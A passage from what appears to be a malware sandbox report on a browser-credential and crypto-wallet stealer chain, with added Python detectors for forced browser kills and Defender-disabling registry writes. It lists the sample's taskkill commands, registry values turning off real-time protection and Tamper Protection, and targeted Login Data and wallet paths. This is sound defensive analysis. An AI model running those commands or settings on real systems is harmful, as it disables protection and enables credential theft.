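    """Per-process technique counts, ATT&CK IDs and the largest delay value seen.

    The report prints relative NT timeouts as negative numbers; only the magnitude
    is kept (922337203685477 is about 29,000 years if read as milliseconds).
    """
    report = defaultdict(lambda: {"techniques": defaultdict(int), "attack": set(), "max_delay": 0})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        procs, finding = parsed
        hits = [(label, tid) for label, rx, tid in RULES if rx.search(finding)]
        delay = DELAY_RE.search(finding)
        for proc in procs:
            entry = report[proc]
            for label, tid in hits:
                entry["techniques"][label] += 1
                if tid:
                    entry["attack"].add(tid)
            if delay:
                entry["max_delay"] = max(entry["max_delay"], int(delay.group(1) or delay.group(2)))
    return {p: {"techniques": dict(e["techniques"]), "attack": e["attack"], "max_delay": e["max_delay"]}
            for p, e in report.items()}


if __name__ == "__main__":
    for proc, entry in sorted(summarise(SAMPLE_LINES).items()):
        print(f"{proc}: max_delay={entry['max_delay']} attack={sorted(entry['attack'])}")
        for label, n in sorted(entry["techniques"].items()):
            print(f"    {n:>3}  {label}")
```

Feeding the whole report section through `summarise` instead of the sample gives the per-process picture a triage note needs: 9c2827fca4.exe carries the classic window-name and SoftICE probes, skotes.exe and ae5cfd188c.exe rely on timing, and firefox.exe only shows the benign Winsock string.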

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 6796, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 11_2_006D1201
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006B2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_006B2BA5
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DB226 SendInput,keybd_event, 11_2_006DB226
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006F22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 11_2_006F22DA
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 11_2_006D0B62
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 11_2_006D1663
Source: 2ada66c192.exe, 0000000B.00000000.2593438166.0000000000732000.00000002.00000001.01000000.0000000B.sdmp, 2ada66c192.exe, 0000001E.00000002.2915748492.0000000000732000.00000002.00000001.01000000.0000000B.sdmp, 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 37df924488.exe, 37df924488.exe, 00000009.00000002.2576273292.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: dProgram Manager
Source: 9c2827fca4.exe, 0000001C.00000002.2847103308.0000000000858000.00000040.00000001.01000000.00000012.sdmp Binary or memory string: nProgram Manager
Source: 2ada66c192.exe Binary or memory string: Shell_TrayWnd
Source: firefox.exe, 00000018.00000002.2789947329.000000D7FE7FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: file.exe, 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: ^lProgram Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ABDD91 cpuid 6_2_00ABDD91
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_009FCBEA
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006CD27A GetUserNameW, 11_2_006CD27A
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006ABB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 11_2_006ABB6F
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_006742DE
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
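The taskkill burst recorded above (five browsers force-closed from 2ada66c192.exe, the whole sequence issued twice) is the behaviour the Credential Flusher signature keys on: the browsers are force-closed so that their profile databases, which are locked while the browser runs, can be read and the browser brought back up on the stealer's terms. A single taskkill /F /IM chrome.exe is routine for installers; several distinct browsers killed by the same parent within seconds is not. The following is an added detection example, not Joe Sandbox's or the sample's code. The events are constructed in a Sysmon Event ID 1-like shape: the parent PID 1364, the image paths and the command lines are taken from this report, while the timestamps, the benign second parent and the 60-second window are assumptions.

```python
"""Detect a forced browser-termination burst from process-creation events.

Added example (not Joe Sandbox's or the sample's code). Events are constructed
in a Sysmon Event ID 1-like shape; PID 1364, the image paths and the taskkill
command lines come from the report, everything else is assumed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
TASKKILL_RE = re.compile(r"(?:^|\\)taskkill(?:\.exe)?$", re.IGNORECASE)
# Parent staged under %TEMP%\<digits>\<hex>.exe, the drop layout seen in this report
TEMP_DROP_RE = re.compile(r"\\AppData\\Local\\Temp\\\d+\\[0-9a-f]+\.exe$", re.IGNORECASE)

# Constructed sample: "<utc time>|<ppid>|<parent image>|<pid>|<image>|<command line>"
SAMPLE_EVENTS = """\
2024-12-09T10:15:01Z|1364|C:\\Users\\user\\AppData\\Local\\Temp\\1013538001\\2ada66c192.exe|5120|C:\\Windows\\SysWOW64\\taskkill.exe|taskkill /F /IM firefox.exe /T
2024-12-09T10:15:01Z|1364|C:\\Users\\user\\AppData\\Local\\Temp\\1013538001\\2ada66c192.exe|5124|C:\\Windows\\SysWOW64\\taskkill.exe|taskkill /F /IM chrome.exe /T
2024-12-09T10:15:02Z|1364|C:\\Users\\user\\AppData\\Local\\Temp\\1013538001\\2ada66c192.exe|5128|C:\\Windows\\SysWOW64\\taskkill.exe|taskkill /F /IM msedge.exe /T
2024-12-09T10:15:02Z|1364|C:\\Users\\user\\AppData\\Local\\Temp\\1013538001\\2ada66c192.exe|5132|C:\\Windows\\SysWOW64\\taskkill.exe|taskkill /F /IM opera.exe /T
2024-12-09T10:15:03Z|1364|C:\\Users\\user\\AppData\\Local\\Temp\\1013538001\\2ada66c192.exe|5136|C:\\Windows\\SysWOW64\\taskkill.exe|taskkill /F /IM brave.exe /T
2024-12-09T10:15:40Z|4408|C:\\Program Files\\Vendor\\setup.exe|5300|C:\\Windows\\System32\\taskkill.exe|taskkill /F /IM chrome.exe
2024-12-09T10:15:41Z|4408|C:\\Program Files\\Vendor\\setup.exe|5304|C:\\Windows\\System32\\taskkill.exe|taskkill /IM msedge.exe
2024-12-09T10:15:42Z|4408|C:\\Program Files\\Vendor\\setup.exe|5308|C:\\Windows\\System32\\taskkill.exe|taskkill /F /IM notepad.exe
"""


def parse_events(text):
    """Split the pipe-delimited sample into event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, ppid, parent, pid, image, cmdline = line.split("|", 5)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "ppid": int(ppid), "parent": parent,
            "pid": int(pid), "image": image, "cmdline": cmdline,
        })
    return events


def killed_browser(cmdline):
    """Return the browser image forcibly killed by a taskkill command line, else None.

    A plain whitespace split is enough: taskkill's own arguments never contain
    spaces, and only argv[0] may be a quoted path.
    """
    argv = cmdline.split()
    if not argv or not TASKKILL_RE.search(argv[0].strip('"')):
        return None
    args = argv[1:]
    upper = [a.upper() for a in args]
    if "/F" not in upper:            # a graceful close is not the flush pattern
        return None
    for i, flag in enumerate(upper[:-1]):
        if flag == "/IM":
            target = args[i + 1].strip('"').lower()
            return target if target in BROWSERS else None
    return None


def detect_browser_flush(events, window=timedelta(seconds=60), min_browsers=2):
    """Flag a parent that force-kills at least min_browsers distinct browsers inside window."""
    kills = defaultdict(list)                     # (ppid, parent image) -> [(ts, browser)]
    for ev in events:
        target = killed_browser(ev["cmdline"])
        if target:
            kills[(ev["ppid"], ev["parent"])].append((ev["ts"], target))

    findings = []
    for (ppid, parent), hits in kills.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):        # slide the window from each kill
            in_window = {b for t, b in hits[i:] if t - t0 <= window}
            if len(in_window) >= min_browsers:
                findings.append({
                    "ppid": ppid,
                    "parent": parent,
                    "browsers": sorted(in_window),
                    "first_seen": t0.isoformat(),
                    "parent_in_temp_drop": bool(TEMP_DROP_RE.search(parent)),
                })
                break
    return findings


if __name__ == "__main__":
    for finding in detect_browser_flush(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

The benign installer in the sample kills one browser with /F and one without, so it never reaches two distinct browsers and is not reported; the payload from Temp\1013538001 is reported once with all five browsers and the staging-directory flag set, which is the combination worth an alert rather than a log line.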

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
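The registry writes listed above map one-to-one onto the signatures in the report header (real-time protection, notifications, Tamper Protection, Windows Update policy). Two caveats before reproducing this on a live host: the HKLM\SOFTWARE\Policies writes only succeed from an elevated token, and when Tamper Protection is enabled Defender is designed to disregard such local disable attempts, so the presence of the values shows intent rather than proving protection was off; confirm with Get-MpComputerStatus (RealTimeProtectionEnabled, IsTamperProtected) rather than trusting the registry. The following triage logic is an added example, not Joe Sandbox's or the sample's code. Events are constructed in the shape of Sysmon Event ID 13 (RegistryEvent, value set); the key paths, value names and data come from the report, while the timestamps, the key under which TamperProtection is written (the report records only the value name) and the writer of the values the report attributes to no process are assumptions.

```python
"""Triage registry value-set events against a Defender / Windows Update baseline.

Added example (not Joe Sandbox's or the sample's code). Events are constructed
in a Sysmon Event ID 13-like shape; keys, value names and data come from the
report, the TamperProtection key path and the timestamps are assumed.
"""
import re
from dataclasses import dataclass

DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")


def normalize_key(path):
    """Case-fold a key path and canonicalise the hive prefix for matching."""
    path = path.rstrip("\\").lower()
    if path.startswith("hkey_local_machine\\"):
        path = "hklm\\" + path[len("hkey_local_machine\\"):]
    return path


def parse_details(details):
    """Sysmon renders DWORD data as 'DWORD (0x00000001)'; return it as an int."""
    m = DWORD_RE.fullmatch(details.strip())
    return int(m.group(1), 16) if m else details


DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
# (normalised key, lower-cased value name) -> (data meaning "protection lowered", report signature)
RULES = {
    (normalize_key(DEFENDER_POLICY + r"\Real-Time Protection"), "disablerealtimemonitoring"):
        (1, "Disable Windows Defender real time protection (registry)"),
    (normalize_key(DEFENDER_POLICY + r"\Real-Time Protection"), "disableioavprotection"):
        (1, "Disable Windows Defender real time protection (registry)"),
    (normalize_key(r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications"), "disablenotifications"):
        (1, "Disable Windows Defender notifications (registry)"),
    # Key path assumed: the report records only the value name and data.
    (normalize_key(r"HKLM\SOFTWARE\Microsoft\Windows Defender\Features"), "tamperprotection"):
        (0, "Disables Windows Defender Tamper protection"),
}
WU_POLICY = normalize_key(r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate")
# The report records these writes without data, so any write to them is flagged.
WU_VALUES = {"auoptions", "autoinstallminorupdates", "donotconnecttowindowsupdateinternetlocations"}


@dataclass
class Finding:
    ts: str
    image: str
    key: str
    value: str
    data: object
    signature: str


def triage_registry_events(events):
    """events: iterable of (ts, image, TargetObject, Details); TargetObject is key\\value."""
    findings = []
    for ts, image, target, details in events:
        key, _, value = target.rpartition("\\")
        nkey, nval = normalize_key(key), value.lower()
        data = parse_details(details)
        rule = RULES.get((nkey, nval))
        if rule is not None and data == rule[0]:
            findings.append(Finding(ts, image, key, value, data, rule[1]))
        elif nkey.startswith(WU_POLICY) and nval in WU_VALUES:
            findings.append(Finding(ts, image, key, value, data, "Modifies windows update settings"))
    return findings


def signatures(findings):
    """Distinct report-style signature names hit, for a one-line verdict."""
    return sorted({f.signature for f in findings})


PAYLOAD = r"C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
SAMPLE_EVENTS = [  # constructed; (ts, image, TargetObject, Details)
    ("2024-12-09T10:16:00Z", PAYLOAD, r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications", "DWORD (0x00000001)"),
    ("2024-12-09T10:16:01Z", PAYLOAD, r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection", "DWORD (0x00000001)"),
    ("2024-12-09T10:16:01Z", PAYLOAD, r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "DWORD (0x00000001)"),
    ("2024-12-09T10:16:02Z", PAYLOAD, r"HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection", "DWORD (0x00000000)"),
    ("2024-12-09T10:16:03Z", PAYLOAD, r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\AUOptions", "DWORD (0x00000001)"),
    ("2024-12-09T10:16:03Z", PAYLOAD, r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations", "DWORD (0x00000001)"),
    # An administrator restoring real-time monitoring (data 0) must not alert.
    ("2024-12-09T11:02:10Z", r"C:\Windows\regedit.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "DWORD (0x00000000)"),
    # Unrelated user-hive write.
    ("2024-12-09T11:05:00Z", r"C:\Windows\explorer.exe", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "DWORD (0x00000001)"),
]

if __name__ == "__main__":
    hits = triage_registry_events(SAMPLE_EVENTS)
    for h in hits:
        print(h.ts, h.image, h.key + "\\" + h.value, h.data, "->", h.signature)
    print(signatures(hits))
```

Matching on data rather than on the value name alone is what keeps the administrator's DisableRealtimeMonitoring=0 out of the findings; the Windows Update values are the exception, flagged on any write because the report does not give the data written, so tune that rule to your own baseline before deploying it.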

Stealing of Sensitive Information

Source: Yara match File source: 6.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2ada66c192.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 7872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 3512, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2760593914.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2534662557.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2673057530.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2575911980.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets=
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s/ElectronCash
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertyfilplm
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: r-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Bina
Source: ae5cfd188c.exe, 0000000A.00000003.2630336262.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wu
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":g
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
